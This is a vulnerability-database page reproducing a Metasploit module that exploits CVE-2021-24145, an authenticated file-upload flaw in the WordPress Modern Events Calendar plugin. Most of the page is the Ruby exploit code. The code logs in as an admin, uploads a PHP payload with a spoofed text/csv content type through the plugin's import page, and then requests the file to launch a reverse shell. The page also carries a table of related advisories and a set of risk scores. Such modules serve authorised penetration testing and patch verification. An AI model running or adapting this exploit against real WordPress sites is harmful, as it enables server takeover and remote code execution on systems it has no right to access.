WordPress Modern Events Calendar Remote Code Execution Exploit

🗓️ 26 Jul 2021 00:00:00Reported by metasploitType

zdt🔗 0day.today👁 184 Views

WordPress Modern Events Calendar plugin RCE exploi

Reporter	Title	Published	Views	Family All 19
0day.today	Wordpress Modern Events Calendar 5.16.2 Plugin - Remote Code Execution (Authenticated) Exploit	2 Jul 202100:00	–	zdt
GithubExploit	Exploit for Unrestricted Upload of File with Dangerous Type in Webnus Modern_Events_Calendar_Lite	14 Aug 202102:56	–	githubexploit
Circl	CVE-2021-24145	10 Jul 202116:29	–	circl
CNNVD	Wordpress Modern Events Calendar Lite 代码问题漏洞	18 Mar 202100:00	–	cnnvd
Check Point Advisories	WordPress Modern Events Calendar Plugin Remote Code Execution (CVE-2021-24145)	18 Aug 202100:00	–	checkpoint_advisories
CVE	CVE-2021-24145	18 Mar 202114:57	–	cve
Cvelist	CVE-2021-24145 Modern Events Calendar Lite < 5.16.5 - Authenticated Arbitrary File Upload leading to RCE	18 Mar 202114:57	–	cvelist
Exploit DB	Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)	2 Jul 202100:00	–	exploitdb
Metasploit	Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution	26 Jul 202117:43	–	metasploit
Nuclei	WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload	10 Jun 202605:11	–	nuclei

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution',
        'Description' => %q{
          This module allows an attacker with a privileged Wordpress account to launch a reverse shell
          due to an arbitrary file upload vulnerability in Wordpress plugin Modern Events Calendar < 5.16.5.
          This is due to an incorrect check of the uploaded file extension.
          Indeed, by using `text/csv` content-type in a request, it is possible to upload a .php payload as is is not forbidden by the plugin.
          Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/<random_payload_name>.php`
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Nguyen Van Khanh', # Original PoC and discovery
            'Ron Jost', # Exploit-db
            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
          ],
        'References' =>
          [
            ['EDB', '50115'],
            ['CVE', '2021-24145'],
            ['CWE', '434']
          ],
        'Platform' => [ 'php' ],
        'Arch' => ARCH_PHP,
        'Targets' =>
        [
          [ 'Wordpress Modern Events Calendar < 5.16.5', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2021-01-29',
        'Notes' =>
          {
            'Stability' => [ CRASH_SAFE ],
            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
            'Reliability' => [ REPEATABLE_SESSION ]
          }
      )
    )

    register_options [
      OptString.new('USERNAME', [true, 'Username of the admin account', 'admin']),
      OptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']),
      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])
    ]
  end

  def check
    unless wordpress_and_online?
      return CheckCode::Safe('Server not online or not detected as Wordpress')
    end

    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
    if cookie
      check_plugin_version_from_readme('modern-events-calendar-lite', '5.16.5')
    else
      CheckCode::Detected('The admin credentials given are wrong !')
    end
  end

  def exploit
    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
    fail_with(Failure::NoAccess, 'Authentication failed') unless cookie
    payload_name = "#{Rex::Text.rand_text_alpha_lower(5)}.php"

    post_data = Rex::MIME::Message.new
    post_data.add_part(payload.encoded, 'text/csv', nil, "form-data; name='feed'; filename='#{payload_name}'")
    post_data.add_part('import-start-bookings', nil, nil, "form-data; name='mec-ix-action'")

    print_status("Uploading file \'#{payload_name}\' containing the payload...")

    r = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
      'headers' => {
        'Origin' => full_uri('')
      },
      'vars_get' => {
        'page' => 'MEC-ix',
        'tab' => 'MEC-import'
      },
      'cookie' => cookie,
      'data' => post_data.to_s,
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
    )

    fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file") unless r&.code == 200
    register_file_for_cleanup(payload_name)

    print_status('Triggering the payload ...')
    send_request_cgi(
      'method' => 'GET',
      'headers' => {
        'Origin' => full_uri('')
      },
      'cookie' => cookie,
      'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/#{payload_name}")
    )
  end
end

26 Jul 2021 00:00Current

0.5Low risk

Vulners AI Score0.5

CVSS 26.5

CVSS 3.17.2

EPSS0.91299